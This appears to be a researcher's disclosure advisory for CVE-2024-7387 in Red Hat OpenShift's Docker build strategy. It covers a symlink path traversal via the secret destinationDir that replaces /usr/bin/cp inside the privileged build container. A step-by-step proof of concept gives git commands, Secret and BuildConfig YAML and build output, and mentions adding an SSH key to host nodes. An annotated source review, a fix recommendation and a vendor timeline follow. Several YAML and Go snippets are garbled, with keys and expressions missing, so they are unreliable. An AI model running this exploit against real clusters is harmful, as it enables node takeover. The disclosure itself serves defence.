Product: Red Hat - OpenShift Container Platform
CVE Number: CVE-2024-7387
Tested version: see 'Version information'
Vulnerable version:
Fixed version:
CVSS Score: Critical 9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Found:Jul 24, 2024

Product description

Red Hat OpenShift is the leading hybrid cloud application platform, bringing together a comprehensive set of tools and services that streamline the entire application lifecycle.

Trusted by 3,000 customers across industries (including 56% of the top 25 Global Fortune 500), it combines built-in security features with dedicated support, a trusted software supply chain, and Red Hat Enterprise Linux® as the operating foundation.

Available in self-managed or fully managed cloud service editions, OpenShift offers a complete set of integrated tools and services for cloud-native, AI, and traditional workloads alike.

Red Hat - OpenShift Platform

Vulnerability overview

OpenShift allows a user to create his own images with the help of the build component. This component has three primary build strategies available (Docu - Understanding image builds):

  • Docker build
  • Source-to-Image (S2I) build
  • Custom build

As the builds are running in a privileged container, a vulnerability in this process allows an atttacker to escalate their permissions on the cluster and host nodes.

The custom build is not safe, because they can execute any code within a privileged container and are disabled by default. The other two strategies are considered as safe and are enabled for all users that can create builds.

But there is a note about the docker strategy:

Grant docker build permissions with caution, because a vulnerability in the Dockerfile processing logic could result in a privileges being granted on the host node.


The docker strategy / the image used during the build has a vulnerabiliy, which allows an attacker to override files inside the privileged build container with the help of the spec.source.secrets.secret.destinationDir attribute of the BuildConfig definition. After overriding the binary, execution of this overriden file can be triggered with another secret and the malicious code is executed in the privileged container.

As stated above, running code in a privileged container allows an attacker to escalate their permissions on the cluster and host nodes. As an example the host filesystem of the worker node can be mounted and a new SSH key can be added to user core of the Red Hat Enterprise Linux CoreOS (RHCOS).

Proof of concept

To exploit the vulnerability the following steps have to be done:

1) Create a git repository with a Dockerfile and a symbolic link to /usr/bin 2) Create a secret, with the key cp and the content is the bash script executed during exploitation 3) Create another secret with arbitrary content, only used to trigger the exploit 4) Create a BuildConfig:

  • Using docker as spec.strategy.type
  • Reference the created ‘git’ repo in spec.source.git.uri
  • Reference both secrets in spec.source.secrets
  • Set the spec.source.secrets[0].destinationDir attr to the symblic link from to git repo 5) Trigger the build, which executes the payload in the privileged container

Step1 - Git repo

Create a git repository which can be access by OpenShift and add a Dockerfile and a symbolic link.

mkdir /tmp/poc-repo
cd /tmp/poc-repo
git init
touch Dockerfile
# provide content for dockerfile
ln -s /usr/bin usr_bin

git add Dockerfile  usr_bin
git commit -m "PoC"
git push

The Dockerfile has the following content (snippet):

COPY . .
RUN ls -la


It copies all files from the current docker build ContextDir. During the build the ContextDir is set to /tmp/build/inputs/ in the privilged build containers filesystem. Then it lists all copied files via ls.

Step2 - Create secret with payload to execute

Create a new secret which uses the key cp and set the exploit payload as value and apply it.

kind: Secret
apiVersion: v1
  name: build-path-traversal  
  cp: |
    touch /tmp/build/inputs/poc-rce.txt
type: Opaque


oc apply -f ./definition/secret-build-path-traversal.yaml 
secret/build-path-traversal created

The provided payload creates a file in the docker build ContextDir, which should be copied to the image during the build via COPY . ..

touch /tmp/build/inputs/poc-rce.txt

Step3 - Create the “trigger” secret

Create a new secret with arbitrary content and apply it.

kind: Secret
apiVersion: v1
  name: trigger-rce
  trigger: pwned

type: Opaque


oc apply -f ./definition/secret-trigger-rce.yaml
secret/trigger-rce created

Step4 - Create a BuildConfig

Then BuildConfig config has to be created and applied.

kind: BuildConfig
  name: build-priv-esc
  nodeSelector: null
    type: Docker
      dockerfilePath: Dockerfile
    type: Git
      uri: 'https://<REDACTED>/build-rce-poc.git'
      ref: main
    contextDir: /
      - secret:
          name: build-path-traversal
        destinationDir: usr_bin
      - secret:
          name: trigger-rce


oc apply -f ./definition/build-cfg.yaml created

The important parts of this definion are:

  • Using the docker strategy:
      nodeSelector: null
        type: Docker  
  • Set the destinationDir of secret/build-path-traversal to the symbolic link in the git repo
    # ....  
        contextDir: /
          - secret:
              name: build-path-traversal
            destinationDir: usr_bin  

Step5 - Trigger the build / RCE

After starting the build, the log can be inspected and verified that RUN ls -la lists the file poc-rce.txt.

oc start-build build-priv-esc started
STEP 5/8: RUN ls -la
total 4
drwxr-xr-x    1 root     root            70 Jul 31 07:57 .
dr-xr-xr-x    1 root     root            17 Jul 31 07:57 ..
drwxr-xr-x    8 root     root           163 Jul 31 07:57 .git
-rw-r--r--    1 root     root           967 Jul 31 07:57 Dockerfile
-rw-r--r--    1 root     root             0 Jul 31 07:57 poc-rce.txt

Build log

Source of the bug

The source code of the builder image can be found on GitHub - Builder. Doing some manual source code review revealed the bug. The code for handling the docker strategy and copying secrets can be found in pkg\build\builder\docker.go.

Comments with the prefix // <<!! PoC Review !! >> highlight key parts for the exploit.

// FILE: pkg\build\builder\docker.go

// ----------
// dockerBuild performs a docker build on the source that has been retrieved
func (d *DockerBuilder) dockerBuild(ctx context.Context, dir string, tag string) error {
	var noCache bool
	var forcePull bool
	var buildArgs []docker.BuildArg
	dockerfilePath := defaultDockerfilePath
	if != nil {
		if != "" {
			dir = filepath.Join(dir,
		if != "" {
			dockerfilePath =
		for _, ba := range {
			buildArgs = append(buildArgs, docker.BuildArg{Name: ba.Name, Value: ba.Value})
		noCache =
		forcePull =

	auth := mergeNodeCredentialsDockerAuth(os.Getenv(dockercfg.PullAuthType))

  // <<!! PoC Review !! >>
  // Call copySecrets during a dockerBuild  
	if err := d.copySecrets(, dir); err != nil {
		return err

// ----------

// copySecrets copies all files from the directory where the secret is
// mounted in the builder pod to a directory where the is the Dockerfile, so
// users can ADD or COPY the files inside their Dockerfile.
func (d *DockerBuilder) copySecrets(secrets []buildapiv1.SecretBuildSource, targetDir string) error {
	var err error
	for _, s := range secrets {
		err = d.copyLocalObject(secretSource(s), secretBuildSourceBaseMountPath, targetDir)
		if err != nil {
			return err
	return nil

func (d *DockerBuilder) copyLocalObject(s localObjectBuildSource, sourceDir, targetDir string) error {

  // <<!! PoC Review !! >>
  // Create dstDir based on the value specified in the BuildConfig definition
  // targetDir := /tmp/build/inputs/  -- docker build context
  // s.DestinationPath() := usr_bin
  // dstDir == /tmp/build/inputs/usr_bin -- Which is a symbolic link to /usr/bin
	dstDir := filepath.Join(targetDir, s.DestinationPath())

  // <<!! PoC Review !! >>
  // Make everything in dstDir `rwx' for `user,group other` `0777`
	if err := os.MkdirAll(dstDir, 0777); err != nil {
		return err
	log.V(3).Infof("Copying files from the build source %q to %q", s.LocalObjectRef().Name, dstDir)

	// Build sources contain nested directories and fairly baroque links. To prevent extra data being
	// copied, perform the following steps:
	// 1. Only top level files and directories within the secret directory are candidates
	// 2. Any item starting with '..' is ignored
	// 3. Destination directories are created first with 0777
	// 4. Use the '-L' option to cp to copy only contents.
	srcDir := filepath.Join(sourceDir, s.LocalObjectRef().Name)

  // <<!! PoC Review !! >>
  // Walk the the mounted secrets specified in the `BuildConfig`
  // As we named the key in `secret/build-path-traversal` `cp` there is a file mounted with this name
	if err := filepath.Walk(srcDir, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		if srcDir == path {
			return nil

		// skip any contents that begin with ".."
		if strings.HasPrefix(filepath.Base(path), "..") {
			if info.IsDir() {
				return filepath.SkipDir
			return nil

		// ensure all directories are traversable
		if info.IsDir() {
			if err := os.MkdirAll(dstDir, 0777); err != nil {
				return err

    // <<!! PoC Review !! >>
    // Use the `cp` command to copy the mounted secrets to the 'ContextDir'
    // During processing of `secret/build-path-traversal`
    // cp copies /run/secrets/buidl-path-traversal/cp to /tmp/build/inputs/usr_bin/cp
    // As /tmp/build/inputs/usr_bin is a symbolic link to /usr/bin /usr/bin/cp is replaced by the payload

    // During processing of `secret/trgger-rce` `/usr/bin/cp` is already replaced by the payload and is executed
    // in the privileged build container
		out, err := exec.Command("cp", "-vLRf", path, dstDir+"/").Output()
		if err != nil {
			log.V(4).Infof("Build source %q failed to copy: %q", s.LocalObjectRef().Name, string(out))
			return err


To fix this vulnerability the variable dstDir in the function copyLocalObject has to be validated to share a common basePath with the docker build ContextDir after it has been made absolute (resolve /../ ) and canonicalized (resolve symblic links).

Version information

The vulnerability was found and verified using the application versions listed below:

oc version                                                                                     
Client Version:
Kustomize Version: v4.5.7
Server Version: 4.12.59
Kubernetes Version: v1.25.16+306a47e

oc get pod build-priv-esc-7-build -o json  | jq ".spec.containers[0].image"


See RedHat - CVE-2024-7387 Affected Packages and Issued Red Hat Security Errata


  • 2024-07-31: Vendor contacted via, GPG encrypted
  • 2024-08-01: Vendor replied that they are working on the report and that they resevered CVE-2024-7387
  • 2024-08-16: Asked the vendor about an status update
  • 2024-08-26: Asked the vendor again about an status update
  • 2024-08-26: Vendor replied that they are still working on it and have no specific release date for the fix
  • 2024-09-12: Vendor informed me that the vulnerability info would be published on 2024-09-16
  • 2024-09-16: Vendor released public information about the vulnerability at
  • 2024-09-19: Vendor released fixed versions